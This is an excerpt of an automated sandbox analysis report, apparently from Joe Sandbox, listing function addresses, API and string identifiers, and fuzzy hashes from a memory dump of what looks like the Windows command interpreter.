                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: fprintf
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 383729395-2781220306
                                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction ID: 7efa7412708c4475bc301aa16b60e94dd4ed1695ee7cc9a5d6cdb646dbe52e31
                                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction Fuzzy Hash: F6116D6190A642C5EA56AB1CF9400B9A261EB45BF8FC69331D67E432F4BF2CA4858360
                                                                                                          Function 00007FF7AB1304F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction ID: e2f0a8ee87b09dd26c0c39adb2910c4f5c23e842aece980b96ec8c6c7aa43abc
                                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction Fuzzy Hash: 37011E20E0BA06C1EA8AA71DF891134A2A0EF49738FC60735C53E027F0EE3C64859320
                                                                                                          Function 00007FF7AB1473C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                          • API String ID: 1646373207-919018592
                                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction ID: 55a6e5f289a37a147745bebc8e4648ae44375e3164dbfa1bb1a7601c7ac5f7e2
                                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction Fuzzy Hash: D4F03062B1978192E6066B1AF484079FB60FF89BD4B899634DA4E03734DF3CD485C710
                                                                                                          Function 00007FF7AB134878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3270668897-0
                                                                                                          • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                                                          • Instruction ID: 47e80d3b477e4105843065553cbda311e28f7f7b59457c5b16b0b4afe697e5dc
                                                                                                          • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                                                          • Instruction Fuzzy Hash: B4518412E0A74281FA9A7F1CF4501B9E2A1EF45B88FDA8131C94E476F9FE2CD5498370
                                                                                                          Function 00007FF7AB14F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3442494845-0
                                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                          • Instruction ID: d3852de53951b44649d88112ec1a83be244e6ef0272a4be7b0ae085fc7383aa1
                                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                          • Instruction Fuzzy Hash: 3531E232616BC2CAEB61DF18E8843E9B7A4FB88B88F854135DA4D47B24DF38D205C750
                                                                                                          Function 00007FF7AB138F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                          • Instruction ID: 60f49438f702568cb17fda4e0eefec3f3f77e0b57e5c23263d9f0e630bb7de42
                                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                          • Instruction Fuzzy Hash: 4D41F975A0AB0691EB52AB0CF880765B3A4FB88748FD20635D98D43774EF3DE598C720
                                                                                                          Function 00007FF7AB138470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcstol$lstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3515581199-0
                                                                                                          • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                          • Instruction ID: 2d2c77706f86b86588af792687cade60a863a71b900a74d5f7732a779307aac3
                                                                                                          • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                          • Instruction Fuzzy Hash: 1121AC3660A64283E6EB6B7DF094139EF90FB4A748F965134DB4F03A74EE6CE4498710
                                                                                                          Function 00007FF7AB124F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 4019809305-0
                                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                          • Instruction ID: f3a629424f6519f46ab2c2c49881152a9fc54ff835a131c1d38d1bc6da72b246
                                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                          • Instruction Fuzzy Hash: 2B31D325A1A75682E7926B1CF480338E690BF49B98F965238DD0E43BF5DF3CD4848710
                                                                                                          Function 00007FF7AB151914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029679093-0
                                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                          • Instruction ID: 73b11edf61ddf1ebe1b17f8dc85a1c5f79e8e665af112f506064334362017b63
                                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                          • Instruction Fuzzy Hash: DD315032706BC189EB229F29E8943E8B7A4FB49B88F454235CA4D47768DF3CD655C710
                                                                                                          Function 00007FF7AB137CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                          • Instruction ID: 3807b6023560b74fb4de1106b98241971445db280ba61e608a7451c89c8febc0
                                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                          • Instruction Fuzzy Hash: 4021B761A0AB4281ED05AB1AF540075FBA1FF49BD4B969230DD1F03775DF3CE4458720
                                                                                                          Function 00007FF7AB12E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                            • Part of subcall function 00007FF7AB12EF40: wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • longjmp.MSVCRT ref: 00007FF7AB13CCBC
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13CCE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction ID: 3421365fc4316141d1e7085e1883034efe92e208ba31e61c4dd4459670dc3548
                                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction Fuzzy Hash: 9D610272A0B342C2FA5AAB1DF450679E294AF057ACFDA4635CA1D076F4EE3CE4418720
                                                                                                          Function 00007FF7AB1510D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB1511DC
                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB151277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 1135967885-381716982
                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction ID: 5b076c5eb20c6234371553485e8776a12fb75699f71d2525b927b572e4cb59b8
                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction Fuzzy Hash: 8871D77190A24686D762AF1DF4D0679F6A4FB9879CF920336C94E83BB0DF3CA4519B10
                                                                                                          Function 00007FF7AB1508EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovewcsncmp
                                                                                                          • String ID: 0123456789
                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction ID: b1c65fad879541d4b4ee6d8f6d45a91588e72276dbeb39305840e1515f1e051b
                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction Fuzzy Hash: 0E41FB22F1A78645EA66AF6DF4442BAA394FB44BC8F865231CE4E477B4DF3CD4418350
                                                                                                          Function 00007FF7AB149784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1497D0
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1498D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
